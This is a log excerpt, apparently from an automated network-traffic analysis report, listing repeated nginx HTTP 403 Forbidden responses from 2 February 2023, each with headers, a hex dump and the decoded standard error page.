            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:19 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:20 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:25 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:26 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:27 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:29 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:30 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:31 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:32 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Feb 2023 20:17:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
